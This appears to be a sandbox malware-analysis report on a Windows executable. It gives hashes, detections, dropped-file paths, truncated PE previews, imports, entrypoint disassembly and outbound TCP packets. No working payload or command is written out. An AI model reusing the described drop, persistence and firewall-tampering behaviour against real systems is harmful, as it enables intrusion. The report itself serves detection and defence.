                                                                                                                                                                                            SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                                                                            SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\gaystiqf.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\E2A6.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12005888
                                                                                                                                                                                            Entropy (8bit):3.8030917940266584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:pwbDZlpg+MKH0e+F4a3TCkh4hXfcAg4SzqHeBcgKlClClClClClClClClClClCl8:pUZfgTKH014UBqhEAg4fHe
                                                                                                                                                                                            MD5:6D07EFE4270BD10431D8E32CADCFF4E7
                                                                                                                                                                                            SHA1:AD08F50151D2F7587196092F97BB24BB696C3084
                                                                                                                                                                                            SHA-256:2476273703617870AE392F166BC07D346596D23A159BF762FD5468844B70E33F
                                                                                                                                                                                            SHA-512:03E36F3E9821FB681436A6ED381FB0E03B0EE1DEC5E7EDD27A5A3A3289A9D6EA896CD61F7E7BC355D4E2D34B200F50BC5CEDB36BE02BBDF5C781CC49B77CCD38
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...-..`.........................................@.................................:=..........................................(.......................................................................@...............D............................text...~........................... ..`.data...............................@....tojid..............................@....vese...............................@....fikazap............................@....rsrc...............................@..@.reloc..XF..........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):320000
                                                                                                                                                                                            Entropy (8bit):6.68963832251392
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:03Oruhy9+2efARaYhqUc9xm1IQgUS1u2NG03OF:aOrm0JRzp0x/QgUp2N6
                                                                                                                                                                                            MD5:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            SHA1:D0E5C1E975EC41E222F99F7A235D85317A1BE3A7
                                                                                                                                                                                            SHA-256:164149035D4A3D2EDBA76C0601F6F83E04D45D7C057D221130C57FC9B13FD5B5
                                                                                                                                                                                            SHA-512:004DFFBFCF0F36E6C4A411D3D499F25D8441F98F465D1B8A704CE9E9004D2785604C15F96E33A9761DEFE4AE1454E84BD76DD5CAE1A3658EF14D301FE0B69720
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......`............................ .............@.................................'.......................................T...(.......................................................................@...............D............................text............................... ..`.data...............................@....zas................................@....give...............................@....riyevol............................@....rsrc...............................@..@.reloc..XF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\adijaeg:Zone.Identifier
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                            C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe (copy)
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12005888
                                                                                                                                                                                            Entropy (8bit):3.8030917940266584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:pwbDZlpg+MKH0e+F4a3TCkh4hXfcAg4SzqHeBcgKlClClClClClClClClClClCl8:pUZfgTKH014UBqhEAg4fHe
                                                                                                                                                                                            MD5:6D07EFE4270BD10431D8E32CADCFF4E7
                                                                                                                                                                                            SHA1:AD08F50151D2F7587196092F97BB24BB696C3084
                                                                                                                                                                                            SHA-256:2476273703617870AE392F166BC07D346596D23A159BF762FD5468844B70E33F
                                                                                                                                                                                            SHA-512:03E36F3E9821FB681436A6ED381FB0E03B0EE1DEC5E7EDD27A5A3A3289A9D6EA896CD61F7E7BC355D4E2D34B200F50BC5CEDB36BE02BBDF5C781CC49B77CCD38
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...-..`.........................................@.................................:=..........................................(.......................................................................@...............D............................text...~........................... ..`.data...............................@....tojid..............................@....vese...............................@....fikazap............................@....rsrc...............................@..@.reloc..XF..........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1572864
                                                                                                                                                                                            Entropy (8bit):4.23827032270778
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:VH9yhjdQZT0wNxPwkQ9LLFQQvolLhLg0/+8K7vGneigAgc8O:V9yhjdQZT0CxPwJJv
                                                                                                                                                                                            MD5:B057F97299DBE5E945EEF8754F5D4597
                                                                                                                                                                                            SHA1:C6230D218779F120F9911265D4D3BE4C8D753618
                                                                                                                                                                                            SHA-256:286C246A52C29E67BA99172CCB226A45CF05253EE28354730FE94FCB6F8D203A
                                                                                                                                                                                            SHA-512:74ACDC737EFB2B39C740F422202E9392F956790398E9C3EC35B00A8BCCE0021D75F834C029D88DA82E13F6983BFB50E8850DA397CBF7E6889C48738CBE047F8F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm./..9...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):3.3475884053493443
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:hLz5K5vRv4KgnVVeeDze31NKZtjfT8GRwU3AsPzM8i:9NKPg/eeDzelNYtjoGRwURM8
                                                                                                                                                                                            MD5:A5E06A1D69185A2B857B67E5B04572E8
                                                                                                                                                                                            SHA1:85572781BB9F1FCF67A9FCC48147B01F9D022CF9
                                                                                                                                                                                            SHA-256:361D01FAB30CC588055ACC3204B221A57029A22C9E796F38FB98A2EF7FAAB011
                                                                                                                                                                                            SHA-512:249EE970D19B9CFDEF7BFD65A660C187723B3E6B5813542B33D8A8B18757B4169F5E1918F24A5D83B8D1E1839481AF7A3F1E46D65CB60A582F88A87CFC2CC1AD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm./..9...................................................................................................................................................................................................................................................................................................................................................HvLE.N......G...........x...'..,.~.......................... ..hbin................p.\..,..........nk,....9.......x........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....9....... ........................... .......Z.......................Root........lf......Root....nk ....9................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...
                                                                                                                                                                                            \Device\ConDrv
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3773
                                                                                                                                                                                            Entropy (8bit):4.7109073551842435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                                                            MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                                                            SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                                                            SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                                                            SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):6.68963832251392
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:sbxGIUIhRd.exe
                                                                                                                                                                                            File size:320000
                                                                                                                                                                                            MD5:f768f4a81e8b87d6990895a35b8d7d6c
                                                                                                                                                                                            SHA1:d0e5c1e975ec41e222f99f7a235d85317a1be3a7
                                                                                                                                                                                            SHA256:164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5
                                                                                                                                                                                            SHA512:004dffbfcf0f36e6c4a411d3d499f25d8441f98f465d1b8a704ce9e9004d2785604c15f96e33a9761defe4ae1454e84bd76dd5cae1a3658ef14d301fe0b69720
                                                                                                                                                                                            SSDEEP:6144:03Oruhy9+2efARaYhqUc9xm1IQgUS1u2NG03OF:aOrm0JRzp0x/QgUp2N6
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R.....g.R..])...R...S...R.......R.......R.......R.Rich..R.................PE..L......`...................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:c8d0d8e0f8e0f0e8

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x41b620
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x60CC14F0 [Fri Jun 18 03:37:20 2021 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:64f7fef844b1e4fdfabf9d9b629075a0

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            call 00007F67B457919Bh
                                                                                                                                                                                            call 00007F67B456C286h
                                                                                                                                                                                            pop ebp
                                                                                                                                                                                            ret
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            push FFFFFFFEh
                                                                                                                                                                                            push 0043DC28h
                                                                                                                                                                                            push 0041E800h
                                                                                                                                                                                            mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            add esp, FFFFFF94h
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push edi
                                                                                                                                                                                            mov eax, dword ptr [00440354h]
                                                                                                                                                                                            xor dword ptr [ebp-08h], eax
                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                            push eax
                                                                                                                                                                                            lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                            mov dword ptr [ebp-18h], esp
                                                                                                                                                                                            mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                            mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                            lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            call dword ptr [004010A0h]
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                            jmp 00007F67B456C298h
                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                            ret
                                                                                                                                                                                            mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                            mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                            mov eax, dword ptr [ebp-78h]
                                                                                                                                                                                            jmp 00007F67B456C3C7h
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                            call 00007F67B456C404h
                                                                                                                                                                                            mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                            call 00007F67B4579B8Ah
                                                                                                                                                                                            add esp, 04h
                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                            jne 00007F67B456C27Ch
                                                                                                                                                                                            push 0000001Ch
                                                                                                                                                                                            call 00007F67B456C3BCh
                                                                                                                                                                                            add esp, 04h
                                                                                                                                                                                            call 00007F67B4575364h
                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                            jne 00007F67B456C27Ch
                                                                                                                                                                                            push 00000010h

                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                            • [C++] VS2008 build 21022

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3540x28.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x83b8.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1590000x1dfc.reloc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x13900x1c.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91000x40.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x344.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            .text0x10000x3e6ce0x3e800False0.582125data6.96344242356IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .data0x400000x10c9880x1800False0.340657552083data3.46395750767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .zas0x14d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .give0x14e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .riyevol0x14f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rsrc0x1500000x83b80x8400False0.597271543561data5.82672582834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .reloc0x1590000x46580x4800False0.346462673611data3.68432452042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                            Resources

                                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x156ce80x2dataDutchNetherlands
                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x156ce00x2dataDutchNetherlands
                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x156cf00x2dataDutchNetherlands
                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x156cf80x2dataDutchNetherlands
                                                                                                                                                                                            CIDAFICUDUROSOTAROM0x1565c80x6c7ASCII text, with very long lines, with no line terminatorsSpanishColombia
                                                                                                                                                                                            RT_CURSOR0x156d000x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                                                                                                                            RT_ICON0x1506e00x6c8dataSpanishColombia
                                                                                                                                                                                            RT_ICON0x150da80x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                            RT_ICON0x1513100x10a8dataSpanishColombia
                                                                                                                                                                                            RT_ICON0x1523b80x988dBase III DBT, version number 0, next free block index 40SpanishColombia
                                                                                                                                                                                            RT_ICON0x152d400x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                            RT_ICON0x1531f80x8a8dataSpanishColombia
                                                                                                                                                                                            RT_ICON0x153aa00x6c8dataSpanishColombia
                                                                                                                                                                                            RT_ICON0x1541680x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                            RT_ICON0x1546d00x10a8dataSpanishColombia
                                                                                                                                                                                            RT_ICON0x1557780x988dataSpanishColombia
                                                                                                                                                                                            RT_ICON0x1561000x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                            RT_STRING0x1575c00xe4dataDutchNetherlands
                                                                                                                                                                                            RT_STRING0x1576a80x3a8dataDutchNetherlands
                                                                                                                                                                                            RT_STRING0x157a500x6e6dataDutchNetherlands
                                                                                                                                                                                            RT_STRING0x1581380x1a0dataDutchNetherlands
                                                                                                                                                                                            RT_STRING0x1582d80xdcdataDutchNetherlands
                                                                                                                                                                                            RT_ACCELERATOR0x156ca00x10dataDutchNetherlands
                                                                                                                                                                                            RT_ACCELERATOR0x156c900x10dataDutchNetherlands
                                                                                                                                                                                            RT_GROUP_CURSOR0x1575a80x14dataDutchNetherlands
                                                                                                                                                                                            RT_GROUP_ICON0x1531a80x4cdataSpanishColombia
                                                                                                                                                                                            RT_GROUP_ICON0x1565680x5adataSpanishColombia
                                                                                                                                                                                            None0x156cc00xadataDutchNetherlands
                                                                                                                                                                                            None0x156cd00xadataDutchNetherlands
                                                                                                                                                                                            None0x156cb00xadataDutchNetherlands

                                                                                                                                                                                            Imports

                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            KERNEL32.dllCallNamedPipeW, TerminateProcess, GetExitCodeProcess, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetProcessVersion, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                            DutchNetherlands
                                                                                                                                                                                            SpanishColombia

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Jan 14, 2022 12:29:11.804500103 CET4977880192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:11.822792053 CET80497788.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:11.822952986 CET4977880192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:11.823373079 CET4977880192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:11.823447943 CET4977880192.168.2.48.209.70.0
